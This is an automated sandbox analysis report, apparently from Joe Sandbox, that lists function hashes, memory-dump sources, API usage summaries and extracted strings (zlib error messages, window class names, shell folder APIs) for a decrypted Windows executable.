                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74C09B74663002C1FA6A936328A97E451905B0C391F504511F7064117089BD14975530
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 10892065-0
                                                                                                                                                                                                          • Opcode ID: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
                                                                                                                                                                                                          • Instruction ID: 2c080862c33f0b7fb519294060e944d109da0d65108c87cfa11e07f441f421b0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40C02B34712690C2E3492323AC033991090F34C3C0FD02018F60102770CE3D80A70B00
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionHandlerRemoveVectored
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1340492425-0
                                                                                                                                                                                                          • Opcode ID: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
                                                                                                                                                                                                          • Instruction ID: 43e8ab96d0ef540813763e0684213002212cef3b8ee59004a75f8fb70944dace
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30C08C78B03B0085FA4AEB03B8883A422606B8C7C1F800008E60E037328E3C04A54780
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                          • Opcode ID: c164aa80badfc177248d89438e49745db99a56b8fb9d29675fc464102b6282a0
                                                                                                                                                                                                          • Instruction ID: b586a9c78aaa43fddf3ec091a8dff657c7d1e7c92e3b3169bdbbaf5832d2cb3a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c164aa80badfc177248d89438e49745db99a56b8fb9d29675fc464102b6282a0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACD06C36614B84C3CA249B06E85135973A0F788B88F900215EA8D0B734CF3DC222DB00
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Message$CreateHeapSend$Freewcslen$Accelerator$LoadMetricsSystemTableTranslate$AllocateBringClassCursorDestroyDispatchEnableEnabledFocusForegroundIconLongObjectRegisterStockwcscpy
                                                                                                                                                                                                          • String ID: BUTTON$C$EDIT$P$STATIC$n
                                                                                                                                                                                                          • API String ID: 1420713935-1690119102
                                                                                                                                                                                                          • Opcode ID: 002200ebb1e1213bc04a13eb1c4ef8fb9e0871078b3e41863b1eb0bca815023c
                                                                                                                                                                                                          • Instruction ID: 503d67efbf07ff6f248b06a67c50be69490569a40db1ce31eb7df8f18fb995d6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 002200ebb1e1213bc04a13eb1c4ef8fb9e0871078b3e41863b1eb0bca815023c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59D134B5605B4086EB12DB62F8447AA77A5FB8CBC8F404129AF4A47B79DF7DC4498B00
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$ClassDestroyEnableNtdllProc_Unregister
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1396861415-0
                                                                                                                                                                                                          • Opcode ID: fc5dfa83332df02ed0060d8fb174e8f27900349cc90facb9f358c39e73375a0a
                                                                                                                                                                                                          • Instruction ID: a4636e2d5cbf899b35d7322a6c98c02ffc5b8df7e19630505cb7187d8542c3a3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc5dfa83332df02ed0060d8fb174e8f27900349cc90facb9f358c39e73375a0a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A210BB4204A5182FB56DB27F8483B923A1E78CBC1F549026FB4A4B7B5DF3DC8859700
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                          • API String ID: 0-2665694366
                                                                                                                                                                                                          • Opcode ID: 022d8aec80773364c7782894b492e5bf51f6f0f1ab81dba49e519fa5dfe17589
                                                                                                                                                                                                          • Instruction ID: 63a129330255db97eb1aabb126bfc5b4551e8f686405ea2d62c327762663274b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 022d8aec80773364c7782894b492e5bf51f6f0f1ab81dba49e519fa5dfe17589
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB620572A106A48BE799CF25D498BED3BF9F748780F518129FB468B7A0E739C845C740
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: $header crc mismatch$unknown compression method$unknown header flags set
                                                                                                                                                                                                          • API String ID: 0-4074041902
                                                                                                                                                                                                          • Opcode ID: 678d21ef58d4a875124531cd8bb27c6309f94b37c07dc777e5a796b3eb271508
                                                                                                                                                                                                          • Instruction ID: 440100e0ad3e42c115cce95f3fb78f0a990aae4413b5501bd8dd5ba0711be261
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 678d21ef58d4a875124531cd8bb27c6309f94b37c07dc777e5a796b3eb271508
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A02B1726007949BEBA78F16C488BAE3BE9FB4CB94F164518EF894B7A0D775C940C740
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: invalid distance code$invalid distance too far back$invalid literal/length code
                                                                                                                                                                                                          • API String ID: 0-3255898291
                                                                                                                                                                                                          • Opcode ID: b59c351ebb6019647229452a56868728e5b182fd303493ccc03160f08c7a3aa8
                                                                                                                                                                                                          • Instruction ID: 3f1348f65b8f8bda14ba5cdfa7bf6f02fc8c4dbb68883e69d1ec2b1899c7470d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b59c351ebb6019647229452a56868728e5b182fd303493ccc03160f08c7a3aa8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5D138326186D08BD71A8F3AD8447BD7FA1F3993C4F54811AEB968B791D63DCA4AC700
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: incorrect header check$invalid window size$unknown compression method
                                                                                                                                                                                                          • API String ID: 0-1186847913
                                                                                                                                                                                                          • Opcode ID: e5d9ef9cb6cfd683bb0b87efb43f2fbb65f2835d92bd1581f31df26c1c39ce5d
                                                                                                                                                                                                          • Instruction ID: c7f0437dc46e56fef3014f932af091831cb3ca76e565b5a088b3fef6b265a946
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5d9ef9cb6cfd683bb0b87efb43f2fbb65f2835d92bd1581f31df26c1c39ce5d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9391A2726106949BFBA6CF26C584B9E3BA9F70C794F114229EB464BBE1C736D950CB00
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: $ $invalid block type
                                                                                                                                                                                                          • API String ID: 0-2056396358
                                                                                                                                                                                                          • Opcode ID: 44e2e5f460598a6c66844f3403f38ee68ad68f3f2a55e5b147868c764788a378
                                                                                                                                                                                                          • Instruction ID: 6826abb0ae9e935998ffe99ae2e08a78a36fe9b187ecd4f73c4f7ab9da41e151
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44e2e5f460598a6c66844f3403f38ee68ad68f3f2a55e5b147868c764788a378
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7161E3B3510B949BE766CF26C8887AD3BE8F708394F554229EB558B7E0D73AC490CB40
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3510742995-0
                                                                                                                                                                                                          • Opcode ID: 1b03f7ef480ea5865ac2d9ef79243ddcad7e3d9da8d43d155ca602e5c9a73022
                                                                                                                                                                                                          • Instruction ID: c8f745e53e58f4d3ff63e30af0f782c513ee99f48fb140b821e661274e727f8d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b03f7ef480ea5865ac2d9ef79243ddcad7e3d9da8d43d155ca602e5c9a73022
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DC291B3A282408BD368CF69E85665BB7A1F7D8748F45A029FB87D3B44D63CD9018F44
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 68354d835f18592a3392b19952e0fe910a5dfe6a9023353f29145046c6faf481
                                                                                                                                                                                                          • Instruction ID: 022ba38ea2fc746ee1b0595bfd7f682d53a7df84c20089d95d53e5e85305b389
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68354d835f18592a3392b19952e0fe910a5dfe6a9023353f29145046c6faf481
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E32283B7F744204BD71DCB69EC52FE836A2B75434C709A02CAA17D3F44EA3DEA158A44
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 503b61509a6e7d9b6eb4f9c1519d37c0dc2229192933667b3bc723eba56df74c
                                                                                                                                                                                                          • Instruction ID: f294bca1e54ba5f97cd1887ffa6c8c7d976b4678fb34f7ffe8470b0002a4fcc7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 503b61509a6e7d9b6eb4f9c1519d37c0dc2229192933667b3bc723eba56df74c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B8150733301749BE7668A2EA514BE93290F3693CEFC56115FB8487B45CA3EB921CB50
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 6b12c9a6a7ee3862a54880f18472b54e1903d2b01c5643e5ee2caa8c01718eea
                                                                                                                                                                                                          • Instruction ID: e67d2bfc1a2697f1f60af7736c02a9787f64ff3490f4c327f028a03746ec3e44
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b12c9a6a7ee3862a54880f18472b54e1903d2b01c5643e5ee2caa8c01718eea
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE715CB23301749BEB658B2E9514BE93390F36A349FC56105EB855BB81CE3EB921CF50
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 0114d8148b93b9f8dfc86a188f1120884a474c0a348be332542b91698de2cadc
                                                                                                                                                                                                          • Instruction ID: b94fce4af05d2a3b47cf10f4c42de706c870d6d3f1c440dba90fb4ad6b70bb1c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0114d8148b93b9f8dfc86a188f1120884a474c0a348be332542b91698de2cadc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3941BB32310640CAFBAA9B1AE020BEE3691E7997C5FD49115DB819FAF0D63BD4058B40
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: ecf803f6c77e2531b53dda9a51864992bde8984847ab9ecc0017d96807bec1df
                                                                                                                                                                                                          • Instruction ID: b19969e3256aa40466f816cedd40d4c0850efff0c11e3a6ff38eb43fc7768fe3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ecf803f6c77e2531b53dda9a51864992bde8984847ab9ecc0017d96807bec1df
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FD0A7E744CBC245E31749381C213681E005B47B74F090356DBF00B2D3FB7788449204
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskmemsetwcsncpy
                                                                                                                                                                                                          • String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                                                                                                                                                                                          • API String ID: 217932011-4219398408
                                                                                                                                                                                                          • Opcode ID: baf9e754506da9efa04bb7baef11d081e03a89bf48f902bbef2c1cfc2494dcfa
                                                                                                                                                                                                          • Instruction ID: f53257261a77fa7679be829afa5858120bcd1a05ac071047bacb850080d37645
                                                                                                                                                                                                          • Opcode Fuzzy Hash: baf9e754506da9efa04bb7baef11d081e03a89bf48f902bbef2c1cfc2494dcfa
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7418D72211B8082EB16EF12E8443EA73A4F78CBC8F544125EB4A477A5EF39C95AC700
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrarywcscatwcslen$AddressAllocateHeapLoadProcTaskValuewcscpy
                                                                                                                                                                                                          • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                                                                                                                                                                                          • API String ID: 1878685483-287042676
                                                                                                                                                                                                          • Opcode ID: af3ba110e3d0ba57517c83c0fb64a893d7f1b6ff8354fe36c6ead1af46344a34
                                                                                                                                                                                                          • Instruction ID: ffb59ae5301eeda9161766390bd85b6f914ac2b2dd013f36d3426db2d5643a12
                                                                                                                                                                                                          • Opcode Fuzzy Hash: af3ba110e3d0ba57517c83c0fb64a893d7f1b6ff8354fe36c6ead1af46344a34
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A64186B1214A46C2FA27EB57B4947F97291AB8C7D0F540127BB0A0B7F5DEB9C841C611
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalCurrentSection$AllocateHeapProcessValue$AllocDuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2673290768-0
                                                                                                                                                                                                          • Opcode ID: aef90992288fd509fbd74998ffb1029e6b7b59a5f56d271f65cebbdd5f433d17
                                                                                                                                                                                                          • Instruction ID: 0ebcb89b5f496a055c7edd3f2936d7e00332f328880e18a7a0f049a68aa3c175
                                                                                                                                                                                                          • Opcode Fuzzy Hash: aef90992288fd509fbd74998ffb1029e6b7b59a5f56d271f65cebbdd5f433d17
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0641E172201B409AEB129F62E8447A977A0F78CBD5F484129EB4D0B774DF39C999D740
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
